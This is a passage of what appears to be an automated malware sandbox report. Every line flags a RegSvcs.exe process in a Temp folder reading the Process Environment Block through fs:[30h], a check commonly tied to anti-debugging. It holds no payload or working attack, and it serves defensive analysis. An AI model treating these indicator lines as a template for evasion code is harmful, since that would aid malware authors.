              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01744500 mov eax, dword ptr fs:[00000030h]15_2_01744500
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01744500 mov eax, dword ptr fs:[00000030h]15_2_01744500
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01744500 mov eax, dword ptr fs:[00000030h]15_2_01744500
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01744500 mov eax, dword ptr fs:[00000030h]15_2_01744500
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01744500 mov eax, dword ptr fs:[00000030h]15_2_01744500
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016725E0 mov eax, dword ptr fs:[00000030h]15_2_016725E0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AC5ED mov eax, dword ptr fs:[00000030h]15_2_016AC5ED
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AC5ED mov eax, dword ptr fs:[00000030h]15_2_016AC5ED
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169E5E7 mov eax, dword ptr fs:[00000030h]15_2_0169E5E7
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169E5E7 mov eax, dword ptr fs:[00000030h]15_2_0169E5E7
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169E5E7 mov eax, dword ptr fs:[00000030h]15_2_0169E5E7
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169E5E7 mov eax, dword ptr fs:[00000030h]15_2_0169E5E7
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169E5E7 mov eax, dword ptr fs:[00000030h]15_2_0169E5E7
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169E5E7 mov eax, dword ptr fs:[00000030h]15_2_0169E5E7
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169E5E7 mov eax, dword ptr fs:[00000030h]15_2_0169E5E7
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169E5E7 mov eax, dword ptr fs:[00000030h]15_2_0169E5E7
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AE5CF mov eax, dword ptr fs:[00000030h]15_2_016AE5CF
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AE5CF mov eax, dword ptr fs:[00000030h]15_2_016AE5CF
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016765D0 mov eax, dword ptr fs:[00000030h]15_2_016765D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AA5D0 mov eax, dword ptr fs:[00000030h]15_2_016AA5D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AA5D0 mov eax, dword ptr fs:[00000030h]15_2_016AA5D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F05A7 mov eax, dword ptr fs:[00000030h]15_2_016F05A7
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F05A7 mov eax, dword ptr fs:[00000030h]15_2_016F05A7
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F05A7 mov eax, dword ptr fs:[00000030h]15_2_016F05A7
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016945B1 mov eax, dword ptr fs:[00000030h]15_2_016945B1
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016945B1 mov eax, dword ptr fs:[00000030h]15_2_016945B1
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A4588 mov eax, dword ptr fs:[00000030h]15_2_016A4588
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01672582 mov eax, dword ptr fs:[00000030h]15_2_01672582
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01672582 mov ecx, dword ptr fs:[00000030h]15_2_01672582
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AE59C mov eax, dword ptr fs:[00000030h]15_2_016AE59C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FC460 mov ecx, dword ptr fs:[00000030h]15_2_016FC460
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169A470 mov eax, dword ptr fs:[00000030h]15_2_0169A470
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169A470 mov eax, dword ptr fs:[00000030h]15_2_0169A470
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169A470 mov eax, dword ptr fs:[00000030h]15_2_0169A470
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AE443 mov eax, dword ptr fs:[00000030h]15_2_016AE443
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AE443 mov eax, dword ptr fs:[00000030h]15_2_016AE443
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AE443 mov eax, dword ptr fs:[00000030h]15_2_016AE443
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AE443 mov eax, dword ptr fs:[00000030h]15_2_016AE443
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AE443 mov eax, dword ptr fs:[00000030h]15_2_016AE443
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AE443 mov eax, dword ptr fs:[00000030h]15_2_016AE443
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AE443 mov eax, dword ptr fs:[00000030h]15_2_016AE443
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AE443 mov eax, dword ptr fs:[00000030h]15_2_016AE443
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169245A mov eax, dword ptr fs:[00000030h]15_2_0169245A
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166645D mov eax, dword ptr fs:[00000030h]15_2_0166645D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166C427 mov eax, dword ptr fs:[00000030h]15_2_0166C427
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166E420 mov eax, dword ptr fs:[00000030h]15_2_0166E420
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166E420 mov eax, dword ptr fs:[00000030h]15_2_0166E420
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166E420 mov eax, dword ptr fs:[00000030h]15_2_0166E420
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F6420 mov eax, dword ptr fs:[00000030h]15_2_016F6420
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F6420 mov eax, dword ptr fs:[00000030h]15_2_016F6420
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F6420 mov eax, dword ptr fs:[00000030h]15_2_016F6420
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F6420 mov eax, dword ptr fs:[00000030h]15_2_016F6420
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F6420 mov eax, dword ptr fs:[00000030h]15_2_016F6420
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F6420 mov eax, dword ptr fs:[00000030h]15_2_016F6420
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F6420 mov eax, dword ptr fs:[00000030h]15_2_016F6420
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AA430 mov eax, dword ptr fs:[00000030h]15_2_016AA430
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A8402 mov eax, dword ptr fs:[00000030h]15_2_016A8402
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A8402 mov eax, dword ptr fs:[00000030h]15_2_016A8402
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A8402 mov eax, dword ptr fs:[00000030h]15_2_016A8402
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016704E5 mov ecx, dword ptr fs:[00000030h]15_2_016704E5
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016764AB mov eax, dword ptr fs:[00000030h]15_2_016764AB
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A44B0 mov ecx, dword ptr fs:[00000030h]15_2_016A44B0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FA4B0 mov eax, dword ptr fs:[00000030h]15_2_016FA4B0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01678770 mov eax, dword ptr fs:[00000030h]15_2_01678770
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680770 mov eax, dword ptr fs:[00000030h]15_2_01680770
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680770 mov eax, dword ptr fs:[00000030h]15_2_01680770
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680770 mov eax, dword ptr fs:[00000030h]15_2_01680770
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680770 mov eax, dword ptr fs:[00000030h]15_2_01680770
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680770 mov eax, dword ptr fs:[00000030h]15_2_01680770
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680770 mov eax, dword ptr fs:[00000030h]15_2_01680770
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680770 mov eax, dword ptr fs:[00000030h]15_2_01680770
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680770 mov eax, dword ptr fs:[00000030h]15_2_01680770
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680770 mov eax, dword ptr fs:[00000030h]15_2_01680770
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680770 mov eax, dword ptr fs:[00000030h]15_2_01680770
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680770 mov eax, dword ptr fs:[00000030h]15_2_01680770
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01680770 mov eax, dword ptr fs:[00000030h]15_2_01680770
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A674D mov esi, dword ptr fs:[00000030h]15_2_016A674D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A674D mov eax, dword ptr fs:[00000030h]15_2_016A674D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A674D mov eax, dword ptr fs:[00000030h]15_2_016A674D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FE75D mov eax, dword ptr fs:[00000030h]15_2_016FE75D
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670750 mov eax, dword ptr fs:[00000030h]15_2_01670750
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F4755 mov eax, dword ptr fs:[00000030h]15_2_016F4755
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2750 mov eax, dword ptr fs:[00000030h]15_2_016B2750
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2750 mov eax, dword ptr fs:[00000030h]15_2_016B2750
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AC720 mov eax, dword ptr fs:[00000030h]15_2_016AC720
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AC720 mov eax, dword ptr fs:[00000030h]15_2_016AC720
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A273C mov eax, dword ptr fs:[00000030h]15_2_016A273C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A273C mov ecx, dword ptr fs:[00000030h]15_2_016A273C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A273C mov eax, dword ptr fs:[00000030h]15_2_016A273C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EC730 mov eax, dword ptr fs:[00000030h]15_2_016EC730
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AC700 mov eax, dword ptr fs:[00000030h]15_2_016AC700
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01670710 mov eax, dword ptr fs:[00000030h]15_2_01670710
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A0710 mov eax, dword ptr fs:[00000030h]15_2_016A0710
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016927ED mov eax, dword ptr fs:[00000030h]15_2_016927ED
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016927ED mov eax, dword ptr fs:[00000030h]15_2_016927ED
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016927ED mov eax, dword ptr fs:[00000030h]15_2_016927ED
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FE7E1 mov eax, dword ptr fs:[00000030h]15_2_016FE7E1
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016747FB mov eax, dword ptr fs:[00000030h]15_2_016747FB
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016747FB mov eax, dword ptr fs:[00000030h]15_2_016747FB
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167C7C0 mov eax, dword ptr fs:[00000030h]15_2_0167C7C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F07C3 mov eax, dword ptr fs:[00000030h]15_2_016F07C3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016707AF mov eax, dword ptr fs:[00000030h]15_2_016707AF
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171678E mov eax, dword ptr fs:[00000030h]15_2_0171678E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AA660 mov eax, dword ptr fs:[00000030h]15_2_016AA660
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AA660 mov eax, dword ptr fs:[00000030h]15_2_016AA660
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173866E mov eax, dword ptr fs:[00000030h]15_2_0173866E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173866E mov eax, dword ptr fs:[00000030h]15_2_0173866E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A2674 mov eax, dword ptr fs:[00000030h]15_2_016A2674
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168C640 mov eax, dword ptr fs:[00000030h]15_2_0168C640
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A6620 mov eax, dword ptr fs:[00000030h]15_2_016A6620
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A8620 mov eax, dword ptr fs:[00000030h]15_2_016A8620
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167262C mov eax, dword ptr fs:[00000030h]15_2_0167262C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168E627 mov eax, dword ptr fs:[00000030h]15_2_0168E627
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168260B mov eax, dword ptr fs:[00000030h]15_2_0168260B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168260B mov eax, dword ptr fs:[00000030h]15_2_0168260B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168260B mov eax, dword ptr fs:[00000030h]15_2_0168260B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168260B mov eax, dword ptr fs:[00000030h]15_2_0168260B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168260B mov eax, dword ptr fs:[00000030h]15_2_0168260B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168260B mov eax, dword ptr fs:[00000030h]15_2_0168260B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168260B mov eax, dword ptr fs:[00000030h]15_2_0168260B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE609 mov eax, dword ptr fs:[00000030h]15_2_016EE609
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B2619 mov eax, dword ptr fs:[00000030h]15_2_016B2619
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE6F2 mov eax, dword ptr fs:[00000030h]15_2_016EE6F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE6F2 mov eax, dword ptr fs:[00000030h]15_2_016EE6F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE6F2 mov eax, dword ptr fs:[00000030h]15_2_016EE6F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE6F2 mov eax, dword ptr fs:[00000030h]15_2_016EE6F2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F06F1 mov eax, dword ptr fs:[00000030h]15_2_016F06F1
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F06F1 mov eax, dword ptr fs:[00000030h]15_2_016F06F1
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AA6C7 mov ebx, dword ptr fs:[00000030h]15_2_016AA6C7
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AA6C7 mov eax, dword ptr fs:[00000030h]15_2_016AA6C7
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AC6A6 mov eax, dword ptr fs:[00000030h]15_2_016AC6A6
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A66B0 mov eax, dword ptr fs:[00000030h]15_2_016A66B0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01674690 mov eax, dword ptr fs:[00000030h]15_2_01674690
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01674690 mov eax, dword ptr fs:[00000030h]15_2_01674690
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B096E mov eax, dword ptr fs:[00000030h]15_2_016B096E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B096E mov edx, dword ptr fs:[00000030h]15_2_016B096E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B096E mov eax, dword ptr fs:[00000030h]15_2_016B096E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01714978 mov eax, dword ptr fs:[00000030h]15_2_01714978
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01714978 mov eax, dword ptr fs:[00000030h]15_2_01714978
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01696962 mov eax, dword ptr fs:[00000030h]15_2_01696962
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01696962 mov eax, dword ptr fs:[00000030h]15_2_01696962
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01696962 mov eax, dword ptr fs:[00000030h]15_2_01696962
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FC97C mov eax, dword ptr fs:[00000030h]15_2_016FC97C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F0946 mov eax, dword ptr fs:[00000030h]15_2_016F0946
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F892A mov eax, dword ptr fs:[00000030h]15_2_016F892A
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0170892B mov eax, dword ptr fs:[00000030h]15_2_0170892B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE908 mov eax, dword ptr fs:[00000030h]15_2_016EE908
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE908 mov eax, dword ptr fs:[00000030h]15_2_016EE908
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FC912 mov eax, dword ptr fs:[00000030h]15_2_016FC912
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01668918 mov eax, dword ptr fs:[00000030h]15_2_01668918
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01668918 mov eax, dword ptr fs:[00000030h]15_2_01668918
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FE9E0 mov eax, dword ptr fs:[00000030h]15_2_016FE9E0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A29F9 mov eax, dword ptr fs:[00000030h]15_2_016A29F9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A29F9 mov eax, dword ptr fs:[00000030h]15_2_016A29F9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173A9D3 mov eax, dword ptr fs:[00000030h]15_2_0173A9D3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017069C0 mov eax, dword ptr fs:[00000030h]15_2_017069C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A9D0 mov eax, dword ptr fs:[00000030h]15_2_0167A9D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A9D0 mov eax, dword ptr fs:[00000030h]15_2_0167A9D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A9D0 mov eax, dword ptr fs:[00000030h]15_2_0167A9D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A9D0 mov eax, dword ptr fs:[00000030h]15_2_0167A9D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A9D0 mov eax, dword ptr fs:[00000030h]15_2_0167A9D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A9D0 mov eax, dword ptr fs:[00000030h]15_2_0167A9D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A49D0 mov eax, dword ptr fs:[00000030h]15_2_016A49D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016709AD mov eax, dword ptr fs:[00000030h]15_2_016709AD
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016709AD mov eax, dword ptr fs:[00000030h]15_2_016709AD
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F89B3 mov esi, dword ptr fs:[00000030h]15_2_016F89B3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F89B3 mov eax, dword ptr fs:[00000030h]15_2_016F89B3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F89B3 mov eax, dword ptr fs:[00000030h]15_2_016F89B3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01706870 mov eax, dword ptr fs:[00000030h]15_2_01706870
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01706870 mov eax, dword ptr fs:[00000030h]15_2_01706870
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FE872 mov eax, dword ptr fs:[00000030h]15_2_016FE872
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FE872 mov eax, dword ptr fs:[00000030h]15_2_016FE872
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01682840 mov ecx, dword ptr fs:[00000030h]15_2_01682840
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01674859 mov eax, dword ptr fs:[00000030h]15_2_01674859
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01674859 mov eax, dword ptr fs:[00000030h]15_2_01674859
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A0854 mov eax, dword ptr fs:[00000030h]15_2_016A0854
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171483A mov eax, dword ptr fs:[00000030h]15_2_0171483A
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171483A mov eax, dword ptr fs:[00000030h]15_2_0171483A
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AA830 mov eax, dword ptr fs:[00000030h]15_2_016AA830
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01692835 mov eax, dword ptr fs:[00000030h]15_2_01692835
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01692835 mov eax, dword ptr fs:[00000030h]15_2_01692835
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01692835 mov eax, dword ptr fs:[00000030h]15_2_01692835
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01692835 mov ecx, dword ptr fs:[00000030h]15_2_01692835
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01692835 mov eax, dword ptr fs:[00000030h]15_2_01692835
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01692835 mov eax, dword ptr fs:[00000030h]15_2_01692835
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016FC810 mov eax, dword ptr fs:[00000030h]15_2_016FC810
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AC8F9 mov eax, dword ptr fs:[00000030h]15_2_016AC8F9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AC8F9 mov eax, dword ptr fs:[00000030h]15_2_016AC8F9
